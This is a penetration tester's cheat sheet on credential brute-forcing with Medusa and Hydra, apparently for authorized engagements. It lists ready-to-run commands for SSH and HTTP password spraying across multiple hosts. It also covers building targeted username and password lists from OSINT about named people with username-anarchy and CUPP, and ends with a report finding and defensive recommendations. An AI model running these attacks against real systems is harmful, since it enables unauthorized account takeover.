🛡️ Methodology Checklist
- Medusa SSH:
medusa -h [TARGET] -u [USER] -P [WORDLIST] -M ssh - Medusa HTTP Basic:
medusa -h [TARGET] -u admin -P [WORDLIST] -M http - Custom script: identify any login form not covered by tools
- Parse response codes and text to confirm success condition
- Respect rate limits and lockout policies during brute-force
- Combine with valid username list for efficiency
🎯 Operational Context
Use when: Hydra fails or target requires custom module — Medusa handles parallel multi-host attacks and supports custom credential testing modules.
Think Dumber First: Medusa is better than Hydra for multi-host parallel spraying. medusa -H targets.txt -U users.txt -P pass.txt -M ssh -t 5 attacks all targets simultaneously. Use -n [PORT] for non-standard ports.
Skip when: Single-target attack where Hydra works — Medusa adds complexity with no benefit for simple cases.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
medusa -h [TARGET_IP] -U [USERLIST] -P [PASSLIST] -M ssh | SSH brute force |
medusa -h [TARGET_IP] -n [PORT] -U [USERLIST] -P [PASSLIST] -M ssh -t 3 | SSH on non-standard port (-n, NOT -s) |
medusa -H [TARGETS] -U [USERLIST] -P [PASSLIST] -M http -m GET | Multi-host HTTP Basic Auth |
medusa -h [TARGET_IP] -U [USERLIST] -e ns -M [MODULE] | Quick check: null password (n) and user=pass (s) |
medusa -h [TARGET_IP] -n [PORT] -u [USER] -P [PASSLIST] -M [MODULE] -t [THREADS] | Throttled single-user attack |
./username-anarchy [FIRST] [LAST] > usernames.txt | Generate corporate username permutations |
cupp -i | Interactive OSINT-based password profiler |
grep -E '^.{6,}$' cupp.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > filtered.txt | Filter CUPP output to password policy |
grep -E '^.{8,}$' wordlist.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' > policy_list.txt | Filter any wordlist to min-length + complexity |
🔬 Deep Dive & Workflow
Medusa vs Hydra — Key Differences
| Feature | Hydra | Medusa |
|---|---|---|
| Port flag | -s | -n |
| Module flag | positional (e.g., ssh at end) | -M ssh (required) |
| Stop on success | -f | -f (host) or -F (all) |
| Verbosity | -V | -v 4 to -v 6 |
| Lower case flags | single string | single string |
| Upper case flags | file path | file path |
Custom Wordlist Generation
Username Anarchy (corporate naming conventions):
sudo apt install ruby -y
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy Jane Smith > jane_usernames.txt
# Generates: jsmith, jane.s, smithj, j.smith, janes, etc.CUPP (OSINT-based password profiling):
sudo apt install cupp -y
cupp -i
# Prompts for: First/Last name, nickname, birthdate, partner, pet, company, keywords
# Answer 'y' to special chars, numbers, leetspeak
# Output: jane.txtOSINT sources: LinkedIn, Facebook, “About Us” pages, PDFs/DOCX from enumeration.
Policy filtering (apply after CUPP generation):
# Example: min 6 chars, upper, lower, digit, 2 special chars
grep -E '^.{6,}$' jane.txt \
| grep -E '[A-Z]' \
| grep -E '[a-z]' \
| grep -E '[0-9]' \
| grep -E '([!@#$%^&*].*){2,}' > filtered.txtFull targeted workflow:
./username-anarchy Jane Smith > usernames.txt
cupp -i # → jane.txt
grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' \
| grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > passwords.txt
hydra -L usernames.txt -P passwords.txt -f 10.10.10.5 -s 8080 \
http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"Key Traps
- Medusa port is
-n, not-s— memorize this, it’s the #1 gotcha vs Hydra - Run username-anarchy from a user-owned directory;
sudo ./...into/root/fails (write denied before script runs) - CUPP “key words” prompt — add company names and project names found during recon
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Medusa not installed | Not on system | Install: apt install medusa or compile from source; or use nxc as alternative for SMB/WinRM |
| Medusa module not found | Wrong module name | List modules: medusa -d; module names differ from Hydra (e.g., smbnt not smb) |
| Multi-host attack too fast | Triggering lockout | Set parallel hosts: -p 1 (1 host at a time); threads per host: -t 2 |
| Custom HTTP module config wrong | Web form structure differs | Use -m DIR:/login:user=^USER^&pass=^PASS^:S=Welcome format; test response string |
| Medusa hangs indefinitely | Target unresponsive | Add timeout: -r 3 (3 retries); -f to stop after first success per host |
📝 Reporting Trigger
Finding Title: Parallel Credential Brute Force Across Multiple Hosts Impact: Multi-host parallel brute force efficiently tests credentials across all identified targets simultaneously, compressing the time required to identify valid credentials from hours to minutes across large environments. Root Cause: No centralized authentication monitoring to detect distributed brute force attacks across multiple hosts. Individual host lockout policies without cross-host correlation. Recommendation: Implement SIEM correlation for distributed authentication failure patterns. Deploy centralized authentication (AD/RADIUS) with unified lockout policies. Network-level rate limiting at the perimeter for authentication protocols.